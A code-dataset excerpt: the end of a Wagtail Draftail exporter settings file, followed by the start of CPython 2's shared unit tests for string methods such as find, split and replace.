ENTITY_TYPES.IMAGE: 'wagtaildraftail.decorators.Image',
ENTITY_TYPES.EMBED: 'wagtaildraftail.decorators.Embed',
ENTITY_TYPES.HORIZONTAL_RULE: 'wagtaildraftail.decorators.HR',
BUTTON_ENTITY_ID: 'home.decorators.Button',
}
DRAFT_EXPORTER_COMPOSITE_DECORATORS = [
'wagtaildraftail.decorators.BR',
]
DRAFT_EXPORTER_BLOCK_MAP = dict(BLOCK_MAP, **{
BLOCK_TYPES.UNORDERED_LIST_ITEM: {
'element': 'li',
'wrapper': 'ul',
'wrapper_props': {'class': 'list-styled'},
},
BLOCK_TYPES.ORDERED_LIST_ITEM: {
'element': 'li',
'wrapper': 'ol',
'wrapper_props': {'class': 'list-numbered'},
},
TERMS_BLOCK_ID: {
'element': 'p',
'props': {'class': 'legals'},
},
})
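# Illustrative note (not part of the original settings): with the wrapper
# overrides above, an unordered-list-item block is expected to export as
# <ul class="list-styled"><li>...</li></ul> rather than the stock BLOCK_MAP's
# plain <ul>.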
| mit |
Voluntarynet/BitmessageKit | BitmessageKit/Vendor/static-python/Lib/test/string_tests.py | 38 | 63594 | """
Common tests shared by test_str, test_unicode, test_userstring and test_string.
"""
import unittest, string, sys, struct
from test import test_support
from UserList import UserList
import _testcapi
class Sequence:
def __init__(self, seq='wxyz'): self.seq = seq
def __len__(self): return len(self.seq)
def __getitem__(self, i): return self.seq[i]
class BadSeq1(Sequence):
def __init__(self): self.seq = [7, 'hello', 123L]
class BadSeq2(Sequence):
def __init__(self): self.seq = ['a', 'b', 'c']
def __len__(self): return 8
class CommonTest(unittest.TestCase):
# This testcase contains test that can be used in all
# stringlike classes. Currently this is str, unicode
# UserString and the string module.
# The type to be tested
# Change in subclasses to change the behaviour of fixtesttype()
type2test = None
# All tests pass their arguments to the testing methods
# as str objects. fixtesttype() can be used to propagate
# these arguments to the appropriate type
def fixtype(self, obj):
if isinstance(obj, str):
return self.__class__.type2test(obj)
elif isinstance(obj, list):
return [self.fixtype(x) for x in obj]
elif isinstance(obj, tuple):
return tuple([self.fixtype(x) for x in obj])
elif isinstance(obj, dict):
return dict([
(self.fixtype(key), self.fixtype(value))
for (key, value) in obj.iteritems()
])
else:
return obj
# check that object.method(*args) returns result
def checkequal(self, result, object, methodname, *args):
result = self.fixtype(result)
object = self.fixtype(object)
args = self.fixtype(args)
realresult = getattr(object, methodname)(*args)
self.assertEqual(
result,
realresult
)
# if the original is returned make sure that
# this doesn't happen with subclasses
if object == realresult:
class subtype(self.__class__.type2test):
pass
object = subtype(object)
realresult = getattr(object, methodname)(*args)
self.assertTrue(object is not realresult)
# check that object.method(*args) raises exc
def checkraises(self, exc, object, methodname, *args):
object = self.fixtype(object)
args = self.fixtype(args)
self.assertRaises(
exc,
getattr(object, methodname),
*args
)
# call object.method(*args) without any checks
def checkcall(self, object, methodname, *args):
object = self.fixtype(object)
args = self.fixtype(args)
getattr(object, methodname)(*args)
def test_hash(self):
# SF bug 1054139: += optimization was not invalidating cached hash value
a = self.type2test('DNSSEC')
b = self.type2test('')
for c in a:
b += c
hash(b)
self.assertEqual(hash(a), hash(b))
def test_capitalize(self):
self.checkequal(' hello ', ' hello ', 'capitalize')
self.checkequal('Hello ', 'Hello ','capitalize')
self.checkequal('Hello ', 'hello ','capitalize')
self.checkequal('Aaaa', 'aaaa', 'capitalize')
self.checkequal('Aaaa', 'AaAa', 'capitalize')
self.checkraises(TypeError, 'hello', 'capitalize', 42)
def test_count(self):
self.checkequal(3, 'aaa', 'count', 'a')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(3, 'aaa', 'count', 'a')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(3, 'aaa', 'count', 'a')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(0, 'aaa', 'count', 'b')
self.checkequal(2, 'aaa', 'count', 'a', 1)
self.checkequal(0, 'aaa', 'count', 'a', 10)
self.checkequal(1, 'aaa', 'count', 'a', -1)
self.checkequal(3, 'aaa', 'count', 'a', -10)
self.checkequal(1, 'aaa', 'count', 'a', 0, 1)
self.checkequal(3, 'aaa', 'count', 'a', 0, 10)
self.checkequal(2, 'aaa', 'count', 'a', 0, -1)
self.checkequal(0, 'aaa', 'count', 'a', 0, -10)
self.checkequal(3, 'aaa', 'count', '', 1)
self.checkequal(1, 'aaa', 'count', '', 3)
self.checkequal(0, 'aaa', 'count', '', 10)
self.checkequal(2, 'aaa', 'count', '', -1)
self.checkequal(4, 'aaa', 'count', '', -10)
self.checkequal(1, '', 'count', '')
self.checkequal(0, '', 'count', '', 1, 1)
self.checkequal(0, '', 'count', '', sys.maxint, 0)
self.checkequal(0, '', 'count', 'xx')
self.checkequal(0, '', 'count', 'xx', 1, 1)
self.checkequal(0, '', 'count', 'xx', sys.maxint, 0)
self.checkraises(TypeError, 'hello', 'count')
self.checkraises(TypeError, 'hello', 'count', 42)
# For a variety of combinations,
# verify that str.count() matches an equivalent function
# replacing all occurrences and then differencing the string lengths
charset = ['', 'a', 'b']
digits = 7
base = len(charset)
teststrings = set()
for i in xrange(base ** digits):
entry = []
for j in xrange(digits):
i, m = divmod(i, base)
entry.append(charset[m])
teststrings.add(''.join(entry))
teststrings = list(teststrings)
for i in teststrings:
i = self.fixtype(i)
n = len(i)
for j in teststrings:
r1 = i.count(j)
if j:
r2, rem = divmod(n - len(i.replace(j, '')), len(j))
else:
r2, rem = len(i)+1, 0
if rem or r1 != r2:
self.assertEqual(rem, 0, '%s != 0 for %s' % (rem, i))
self.assertEqual(r1, r2, '%s != %s for %s' % (r1, r2, i))
def test_find(self):
self.checkequal(0, 'abcdefghiabc', 'find', 'abc')
self.checkequal(9, 'abcdefghiabc', 'find', 'abc', 1)
self.checkequal(-1, 'abcdefghiabc', 'find', 'def', 4)
self.checkequal(0, 'abc', 'find', '', 0)
self.checkequal(3, 'abc', 'find', '', 3)
self.checkequal(-1, 'abc', 'find', '', 4)
# to check the ability to pass None as defaults
self.checkequal( 2, 'rrarrrrrrrrra', 'find', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'find', 'a', 4)
self.checkequal(-1, 'rrarrrrrrrrra', 'find', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'find', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'find', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'find')
self.checkraises(TypeError, 'hello', 'find', 42)
self.checkequal(0, '', 'find', '')
self.checkequal(-1, '', 'find', '', 1, 1)
self.checkequal(-1, '', 'find', '', sys.maxint, 0)
self.checkequal(-1, '', 'find', 'xx')
self.checkequal(-1, '', 'find', 'xx', 1, 1)
self.checkequal(-1, '', 'find', 'xx', sys.maxint, 0)
# issue 7458
self.checkequal(-1, 'ab', 'find', 'xxx', sys.maxsize + 1, 0)
# For a variety of combinations,
# verify that str.find() matches __contains__
# and that the found substring is really at that location
charset = ['', 'a', 'b', 'c']
digits = 5
base = len(charset)
teststrings = set()
for i in xrange(base ** digits):
entry = []
for j in xrange(digits):
i, m = divmod(i, base)
entry.append(charset[m])
teststrings.add(''.join(entry))
teststrings = list(teststrings)
for i in teststrings:
i = self.fixtype(i)
for j in teststrings:
loc = i.find(j)
r1 = (loc != -1)
r2 = j in i
self.assertEqual(r1, r2)
if loc != -1:
self.assertEqual(i[loc:loc+len(j)], j)
def test_rfind(self):
self.checkequal(9, 'abcdefghiabc', 'rfind', 'abc')
self.checkequal(12, 'abcdefghiabc', 'rfind', '')
self.checkequal(0, 'abcdefghiabc', 'rfind', 'abcd')
self.checkequal(-1, 'abcdefghiabc', 'rfind', 'abcz')
self.checkequal(3, 'abc', 'rfind', '', 0)
self.checkequal(3, 'abc', 'rfind', '', 3)
self.checkequal(-1, 'abc', 'rfind', '', 4)
# to check the ability to pass None as defaults
self.checkequal(12, 'rrarrrrrrrrra', 'rfind', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'rfind', 'a', 4)
self.checkequal(-1, 'rrarrrrrrrrra', 'rfind', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'rfind', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'rfind', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'rfind')
self.checkraises(TypeError, 'hello', 'rfind', 42)
# For a variety of combinations,
# verify that str.rfind() matches __contains__
# and that the found substring is really at that location
charset = ['', 'a', 'b', 'c']
digits = 5
base = len(charset)
teststrings = set()
for i in xrange(base ** digits):
entry = []
for j in xrange(digits):
i, m = divmod(i, base)
entry.append(charset[m])
teststrings.add(''.join(entry))
teststrings = list(teststrings)
for i in teststrings:
i = self.fixtype(i)
for j in teststrings:
loc = i.rfind(j)
r1 = (loc != -1)
r2 = j in i
self.assertEqual(r1, r2)
if loc != -1:
self.assertEqual(i[loc:loc+len(j)], self.fixtype(j))
# issue 7458
self.checkequal(-1, 'ab', 'rfind', 'xxx', sys.maxsize + 1, 0)
def test_index(self):
self.checkequal(0, 'abcdefghiabc', 'index', '')
self.checkequal(3, 'abcdefghiabc', 'index', 'def')
self.checkequal(0, 'abcdefghiabc', 'index', 'abc')
self.checkequal(9, 'abcdefghiabc', 'index', 'abc', 1)
self.checkraises(ValueError, 'abcdefghiabc', 'index', 'hib')
self.checkraises(ValueError, 'abcdefghiab', 'index', 'abc', 1)
self.checkraises(ValueError, 'abcdefghi', 'index', 'ghi', 8)
self.checkraises(ValueError, 'abcdefghi', 'index', 'ghi', -1)
# to check the ability to pass None as defaults
self.checkequal( 2, 'rrarrrrrrrrra', 'index', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'index', 'a', 4)
self.checkraises(ValueError, 'rrarrrrrrrrra', 'index', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'index', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'index', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'index')
self.checkraises(TypeError, 'hello', 'index', 42)
def test_rindex(self):
self.checkequal(12, 'abcdefghiabc', 'rindex', '')
self.checkequal(3, 'abcdefghiabc', 'rindex', 'def')
self.checkequal(9, 'abcdefghiabc', 'rindex', 'abc')
self.checkequal(0, 'abcdefghiabc', 'rindex', 'abc', 0, -1)
self.checkraises(ValueError, 'abcdefghiabc', 'rindex', 'hib')
self.checkraises(ValueError, 'defghiabc', 'rindex', 'def', 1)
self.checkraises(ValueError, 'defghiabc', 'rindex', 'abc', 0, -1)
self.checkraises(ValueError, 'abcdefghi', 'rindex', 'ghi', 0, 8)
self.checkraises(ValueError, 'abcdefghi', 'rindex', 'ghi', 0, -1)
# to check the ability to pass None as defaults
self.checkequal(12, 'rrarrrrrrrrra', 'rindex', 'a')
self.checkequal(12, 'rrarrrrrrrrra', 'rindex', 'a', 4)
self.checkraises(ValueError, 'rrarrrrrrrrra', 'rindex', 'a', 4, 6)
self.checkequal(12, 'rrarrrrrrrrra', 'rindex', 'a', 4, None)
self.checkequal( 2, 'rrarrrrrrrrra', 'rindex', 'a', None, 6)
self.checkraises(TypeError, 'hello', 'rindex')
self.checkraises(TypeError, 'hello', 'rindex', 42)
def test_lower(self):
self.checkequal('hello', 'HeLLo', 'lower')
self.checkequal('hello', 'hello', 'lower')
self.checkraises(TypeError, 'hello', 'lower', 42)
def test_upper(self):
self.checkequal('HELLO', 'HeLLo', 'upper')
self.checkequal('HELLO', 'HELLO', 'upper')
self.checkraises(TypeError, 'hello', 'upper', 42)
def test_expandtabs(self):
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs')
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs', 8)
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs', 4)
self.checkequal('abc\r\nab def\ng hi', 'abc\r\nab\tdef\ng\thi', 'expandtabs', 4)
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs')
self.checkequal('abc\rab def\ng hi', 'abc\rab\tdef\ng\thi', 'expandtabs', 8)
self.checkequal('abc\r\nab\r\ndef\ng\r\nhi', 'abc\r\nab\r\ndef\ng\r\nhi', 'expandtabs', 4)
self.checkequal(' a\n b', ' \ta\n\tb', 'expandtabs', 1)
self.checkraises(TypeError, 'hello', 'expandtabs', 42, 42)
# This test is only valid when sizeof(int) == sizeof(void*) == 4.
if sys.maxint < (1 << 32) and struct.calcsize('P') == 4:
self.checkraises(OverflowError,
'\ta\n\tb', 'expandtabs', sys.maxint)
def test_split(self):
self.checkequal(['this', 'is', 'the', 'split', 'function'],
'this is the split function', 'split')
# by whitespace
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d ', 'split')
self.checkequal(['a', 'b c d'], 'a b c d', 'split', None, 1)
self.checkequal(['a', 'b', 'c d'], 'a b c d', 'split', None, 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'split', None, 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'split', None, 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'split', None,
sys.maxint-1)
self.checkequal(['a b c d'], 'a b c d', 'split', None, 0)
self.checkequal(['a b c d'], ' a b c d', 'split', None, 0)
self.checkequal(['a', 'b', 'c d'], 'a b c d', 'split', None, 2)
self.checkequal([], ' ', 'split')
self.checkequal(['a'], ' a ', 'split')
self.checkequal(['a', 'b'], ' a b ', 'split')
self.checkequal(['a', 'b '], ' a b ', 'split', None, 1)
self.checkequal(['a', 'b c '], ' a b c ', 'split', None, 1)
self.checkequal(['a', 'b', 'c '], ' a b c ', 'split', None, 2)
self.checkequal(['a', 'b'], '\n\ta \t\r b \v ', 'split')
aaa = ' a '*20
self.checkequal(['a']*20, aaa, 'split')
self.checkequal(['a'] + [aaa[4:]], aaa, 'split', None, 1)
self.checkequal(['a']*19 + ['a '], aaa, 'split', None, 19)
# by a char
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|')
self.checkequal(['a|b|c|d'], 'a|b|c|d', 'split', '|', 0)
self.checkequal(['a', 'b|c|d'], 'a|b|c|d', 'split', '|', 1)
self.checkequal(['a', 'b', 'c|d'], 'a|b|c|d', 'split', '|', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'split', '|',
sys.maxint-2)
self.checkequal(['a|b|c|d'], 'a|b|c|d', 'split', '|', 0)
self.checkequal(['a', '', 'b||c||d'], 'a||b||c||d', 'split', '|', 2)
self.checkequal(['endcase ', ''], 'endcase |', 'split', '|')
self.checkequal(['', ' startcase'], '| startcase', 'split', '|')
self.checkequal(['', 'bothcase', ''], '|bothcase|', 'split', '|')
self.checkequal(['a', '', 'b\x00c\x00d'], 'a\x00\x00b\x00c\x00d', 'split', '\x00', 2)
self.checkequal(['a']*20, ('a|'*20)[:-1], 'split', '|')
self.checkequal(['a']*15 +['a|a|a|a|a'],
('a|'*20)[:-1], 'split', '|', 15)
# by string
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//')
self.checkequal(['a', 'b//c//d'], 'a//b//c//d', 'split', '//', 1)
self.checkequal(['a', 'b', 'c//d'], 'a//b//c//d', 'split', '//', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'split', '//',
sys.maxint-10)
self.checkequal(['a//b//c//d'], 'a//b//c//d', 'split', '//', 0)
self.checkequal(['a', '', 'b////c////d'], 'a////b////c////d', 'split', '//', 2)
self.checkequal(['endcase ', ''], 'endcase test', 'split', 'test')
self.checkequal(['', ' begincase'], 'test begincase', 'split', 'test')
self.checkequal(['', ' bothcase ', ''], 'test bothcase test',
'split', 'test')
self.checkequal(['a', 'bc'], 'abbbc', 'split', 'bb')
self.checkequal(['', ''], 'aaa', 'split', 'aaa')
self.checkequal(['aaa'], 'aaa', 'split', 'aaa', 0)
self.checkequal(['ab', 'ab'], 'abbaab', 'split', 'ba')
self.checkequal(['aaaa'], 'aaaa', 'split', 'aab')
self.checkequal([''], '', 'split', 'aaa')
self.checkequal(['aa'], 'aa', 'split', 'aaa')
self.checkequal(['A', 'bobb'], 'Abbobbbobb', 'split', 'bbobb')
self.checkequal(['A', 'B', ''], 'AbbobbBbbobb', 'split', 'bbobb')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'split', 'BLAH')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'split', 'BLAH', 19)
self.checkequal(['a']*18 + ['aBLAHa'], ('aBLAH'*20)[:-4],
'split', 'BLAH', 18)
# mixed use of str and unicode
self.checkequal([u'a', u'b', u'c d'], 'a b c d', 'split', u' ', 2)
# argument type
self.checkraises(TypeError, 'hello', 'split', 42, 42, 42)
# null case
self.checkraises(ValueError, 'hello', 'split', '')
self.checkraises(ValueError, 'hello', 'split', '', 0)
def test_rsplit(self):
self.checkequal(['this', 'is', 'the', 'rsplit', 'function'],
'this is the rsplit function', 'rsplit')
# by whitespace
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d ', 'rsplit')
self.checkequal(['a b c', 'd'], 'a b c d', 'rsplit', None, 1)
self.checkequal(['a b', 'c', 'd'], 'a b c d', 'rsplit', None, 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'rsplit', None, 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'rsplit', None, 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a b c d', 'rsplit', None,
sys.maxint-20)
self.checkequal(['a b c d'], 'a b c d', 'rsplit', None, 0)
self.checkequal(['a b c d'], 'a b c d ', 'rsplit', None, 0)
self.checkequal(['a b', 'c', 'd'], 'a b c d', 'rsplit', None, 2)
self.checkequal([], ' ', 'rsplit')
self.checkequal(['a'], ' a ', 'rsplit')
self.checkequal(['a', 'b'], ' a b ', 'rsplit')
self.checkequal([' a', 'b'], ' a b ', 'rsplit', None, 1)
self.checkequal([' a b','c'], ' a b c ', 'rsplit',
None, 1)
self.checkequal([' a', 'b', 'c'], ' a b c ', 'rsplit',
None, 2)
self.checkequal(['a', 'b'], '\n\ta \t\r b \v ', 'rsplit', None, 88)
aaa = ' a '*20
self.checkequal(['a']*20, aaa, 'rsplit')
self.checkequal([aaa[:-4]] + ['a'], aaa, 'rsplit', None, 1)
self.checkequal([' a a'] + ['a']*18, aaa, 'rsplit', None, 18)
# by a char
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|')
self.checkequal(['a|b|c', 'd'], 'a|b|c|d', 'rsplit', '|', 1)
self.checkequal(['a|b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a|b|c|d', 'rsplit', '|',
sys.maxint-100)
self.checkequal(['a|b|c|d'], 'a|b|c|d', 'rsplit', '|', 0)
self.checkequal(['a||b||c', '', 'd'], 'a||b||c||d', 'rsplit', '|', 2)
self.checkequal(['', ' begincase'], '| begincase', 'rsplit', '|')
self.checkequal(['endcase ', ''], 'endcase |', 'rsplit', '|')
self.checkequal(['', 'bothcase', ''], '|bothcase|', 'rsplit', '|')
self.checkequal(['a\x00\x00b', 'c', 'd'], 'a\x00\x00b\x00c\x00d', 'rsplit', '\x00', 2)
self.checkequal(['a']*20, ('a|'*20)[:-1], 'rsplit', '|')
self.checkequal(['a|a|a|a|a']+['a']*15,
('a|'*20)[:-1], 'rsplit', '|', 15)
# by string
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//')
self.checkequal(['a//b//c', 'd'], 'a//b//c//d', 'rsplit', '//', 1)
self.checkequal(['a//b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//', 2)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//', 3)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//', 4)
self.checkequal(['a', 'b', 'c', 'd'], 'a//b//c//d', 'rsplit', '//',
sys.maxint-5)
self.checkequal(['a//b//c//d'], 'a//b//c//d', 'rsplit', '//', 0)
self.checkequal(['a////b////c', '', 'd'], 'a////b////c////d', 'rsplit', '//', 2)
self.checkequal(['', ' begincase'], 'test begincase', 'rsplit', 'test')
self.checkequal(['endcase ', ''], 'endcase test', 'rsplit', 'test')
self.checkequal(['', ' bothcase ', ''], 'test bothcase test',
'rsplit', 'test')
self.checkequal(['ab', 'c'], 'abbbc', 'rsplit', 'bb')
self.checkequal(['', ''], 'aaa', 'rsplit', 'aaa')
self.checkequal(['aaa'], 'aaa', 'rsplit', 'aaa', 0)
self.checkequal(['ab', 'ab'], 'abbaab', 'rsplit', 'ba')
self.checkequal(['aaaa'], 'aaaa', 'rsplit', 'aab')
self.checkequal([''], '', 'rsplit', 'aaa')
self.checkequal(['aa'], 'aa', 'rsplit', 'aaa')
self.checkequal(['bbob', 'A'], 'bbobbbobbA', 'rsplit', 'bbobb')
self.checkequal(['', 'B', 'A'], 'bbobbBbbobbA', 'rsplit', 'bbobb')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'rsplit', 'BLAH')
self.checkequal(['a']*20, ('aBLAH'*20)[:-4], 'rsplit', 'BLAH', 19)
self.checkequal(['aBLAHa'] + ['a']*18, ('aBLAH'*20)[:-4],
'rsplit', 'BLAH', 18)
# mixed use of str and unicode
self.checkequal([u'a b', u'c', u'd'], 'a b c d', 'rsplit', u' ', 2)
# argument type
self.checkraises(TypeError, 'hello', 'rsplit', 42, 42, 42)
# null case
self.checkraises(ValueError, 'hello', 'rsplit', '')
self.checkraises(ValueError, 'hello', 'rsplit', '', 0)
def test_strip(self):
self.checkequal('hello', ' hello ', 'strip')
self.checkequal('hello ', ' hello ', 'lstrip')
self.checkequal(' hello', ' hello ', 'rstrip')
self.checkequal('hello', 'hello', 'strip')
# strip/lstrip/rstrip with None arg
self.checkequal('hello', ' hello ', 'strip', None)
self.checkequal('hello ', ' hello ', 'lstrip', None)
self.checkequal(' hello', ' hello ', 'rstrip', None)
self.checkequal('hello', 'hello', 'strip', None)
# strip/lstrip/rstrip with str arg
self.checkequal('hello', 'xyzzyhelloxyzzy', 'strip', 'xyz')
self.checkequal('helloxyzzy', 'xyzzyhelloxyzzy', 'lstrip', 'xyz')
self.checkequal('xyzzyhello', 'xyzzyhelloxyzzy', 'rstrip', 'xyz')
self.checkequal('hello', 'hello', 'strip', 'xyz')
# strip/lstrip/rstrip with unicode arg
if test_support.have_unicode:
self.checkequal(unicode('hello', 'ascii'), 'xyzzyhelloxyzzy',
'strip', unicode('xyz', 'ascii'))
self.checkequal(unicode('helloxyzzy', 'ascii'), 'xyzzyhelloxyzzy',
'lstrip', unicode('xyz', 'ascii'))
self.checkequal(unicode('xyzzyhello', 'ascii'), 'xyzzyhelloxyzzy',
'rstrip', unicode('xyz', 'ascii'))
# XXX
#self.checkequal(unicode('hello', 'ascii'), 'hello',
# 'strip', unicode('xyz', 'ascii'))
self.checkraises(TypeError, 'hello', 'strip', 42, 42)
self.checkraises(TypeError, 'hello', 'lstrip', 42, 42)
self.checkraises(TypeError, 'hello', 'rstrip', 42, 42)
def test_ljust(self):
self.checkequal('abc ', 'abc', 'ljust', 10)
self.checkequal('abc ', 'abc', 'ljust', 6)
self.checkequal('abc', 'abc', 'ljust', 3)
self.checkequal('abc', 'abc', 'ljust', 2)
self.checkequal('abc*******', 'abc', 'ljust', 10, '*')
self.checkraises(TypeError, 'abc', 'ljust')
def test_rjust(self):
self.checkequal(' abc', 'abc', 'rjust', 10)
self.checkequal(' abc', 'abc', 'rjust', 6)
self.checkequal('abc', 'abc', 'rjust', 3)
self.checkequal('abc', 'abc', 'rjust', 2)
self.checkequal('*******abc', 'abc', 'rjust', 10, '*')
self.checkraises(TypeError, 'abc', 'rjust')
def test_center(self):
self.checkequal(' abc ', 'abc', 'center', 10)
self.checkequal(' abc ', 'abc', 'center', 6)
self.checkequal('abc', 'abc', 'center', 3)
self.checkequal('abc', 'abc', 'center', 2)
self.checkequal('***abc****', 'abc', 'center', 10, '*')
self.checkraises(TypeError, 'abc', 'center')
def test_swapcase(self):
self.checkequal('hEllO CoMPuTErS', 'HeLLo cOmpUteRs', 'swapcase')
self.checkraises(TypeError, 'hello', 'swapcase', 42)
def test_replace(self):
EQ = self.checkequal
# Operations on the empty string
EQ("", "", "replace", "", "")
EQ("A", "", "replace", "", "A")
EQ("", "", "replace", "A", "")
EQ("", "", "replace", "A", "A")
EQ("", "", "replace", "", "", 100)
EQ("", "", "replace", "", "", sys.maxint)
# interleave (from=="", 'to' gets inserted everywhere)
EQ("A", "A", "replace", "", "")
EQ("*A*", "A", "replace", "", "*")
EQ("*1A*1", "A", "replace", "", "*1")
EQ("*-#A*-#", "A", "replace", "", "*-#")
EQ("*-A*-A*-", "AA", "replace", "", "*-")
EQ("*-A*-A*-", "AA", "replace", "", "*-", -1)
EQ("*-A*-A*-", "AA", "replace", "", "*-", sys.maxint)
EQ("*-A*-A*-", "AA", "replace", "", "*-", 4)
EQ("*-A*-A*-", "AA", "replace", "", "*-", 3)
EQ("*-A*-A", "AA", "replace", "", "*-", 2)
EQ("*-AA", "AA", "replace", "", "*-", 1)
EQ("AA", "AA", "replace", "", "*-", 0)
# single character deletion (from=="A", to=="")
EQ("", "A", "replace", "A", "")
EQ("", "AAA", "replace", "A", "")
EQ("", "AAA", "replace", "A", "", -1)
EQ("", "AAA", "replace", "A", "", sys.maxint)
EQ("", "AAA", "replace", "A", "", 4)
EQ("", "AAA", "replace", "A", "", 3)
EQ("A", "AAA", "replace", "A", "", 2)
EQ("AA", "AAA", "replace", "A", "", 1)
EQ("AAA", "AAA", "replace", "A", "", 0)
EQ("", "AAAAAAAAAA", "replace", "A", "")
EQ("BCD", "ABACADA", "replace", "A", "")
EQ("BCD", "ABACADA", "replace", "A", "", -1)
EQ("BCD", "ABACADA", "replace", "A", "", sys.maxint)
EQ("BCD", "ABACADA", "replace", "A", "", 5)
EQ("BCD", "ABACADA", "replace", "A", "", 4)
EQ("BCDA", "ABACADA", "replace", "A", "", 3)
EQ("BCADA", "ABACADA", "replace", "A", "", 2)
EQ("BACADA", "ABACADA", "replace", "A", "", 1)
EQ("ABACADA", "ABACADA", "replace", "A", "", 0)
EQ("BCD", "ABCAD", "replace", "A", "")
EQ("BCD", "ABCADAA", "replace", "A", "")
EQ("BCD", "BCD", "replace", "A", "")
EQ("*************", "*************", "replace", "A", "")
EQ("^A^", "^"+"A"*1000+"^", "replace", "A", "", 999)
# substring deletion (from=="the", to=="")
EQ("", "the", "replace", "the", "")
EQ("ater", "theater", "replace", "the", "")
EQ("", "thethe", "replace", "the", "")
EQ("", "thethethethe", "replace", "the", "")
EQ("aaaa", "theatheatheathea", "replace", "the", "")
EQ("that", "that", "replace", "the", "")
EQ("thaet", "thaet", "replace", "the", "")
EQ("here and re", "here and there", "replace", "the", "")
EQ("here and re and re", "here and there and there",
"replace", "the", "", sys.maxint)
EQ("here and re and re", "here and there and there",
"replace", "the", "", -1)
EQ("here and re and re", "here and there and there",
"replace", "the", "", 3)
EQ("here and re and re", "here and there and there",
"replace", "the", "", 2)
EQ("here and re and there", "here and there and there",
"replace", "the", "", 1)
EQ("here and there and there", "here and there and there",
"replace", "the", "", 0)
EQ("here and re and re", "here and there and there", "replace", "the", "")
EQ("abc", "abc", "replace", "the", "")
EQ("abcdefg", "abcdefg", "replace", "the", "")
# substring deletion (from=="bob", to=="")
EQ("bob", "bbobob", "replace", "bob", "")
EQ("bobXbob", "bbobobXbbobob", "replace", "bob", "")
EQ("aaaaaaa", "aaaaaaabob", "replace", "bob", "")
EQ("aaaaaaa", "aaaaaaa", "replace", "bob", "")
# single character replace in place (len(from)==len(to)==1)
EQ("Who goes there?", "Who goes there?", "replace", "o", "o")
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O")
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", sys.maxint)
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", -1)
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", 3)
EQ("WhO gOes there?", "Who goes there?", "replace", "o", "O", 2)
EQ("WhO goes there?", "Who goes there?", "replace", "o", "O", 1)
EQ("Who goes there?", "Who goes there?", "replace", "o", "O", 0)
EQ("Who goes there?", "Who goes there?", "replace", "a", "q")
EQ("who goes there?", "Who goes there?", "replace", "W", "w")
EQ("wwho goes there?ww", "WWho goes there?WW", "replace", "W", "w")
EQ("Who goes there!", "Who goes there?", "replace", "?", "!")
EQ("Who goes there!!", "Who goes there??", "replace", "?", "!")
EQ("Who goes there?", "Who goes there?", "replace", ".", "!")
# substring replace in place (len(from)==len(to) > 1)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**")
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", sys.maxint)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", -1)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", 4)
EQ("Th** ** a t**sue", "This is a tissue", "replace", "is", "**", 3)
EQ("Th** ** a tissue", "This is a tissue", "replace", "is", "**", 2)
EQ("Th** is a tissue", "This is a tissue", "replace", "is", "**", 1)
EQ("This is a tissue", "This is a tissue", "replace", "is", "**", 0)
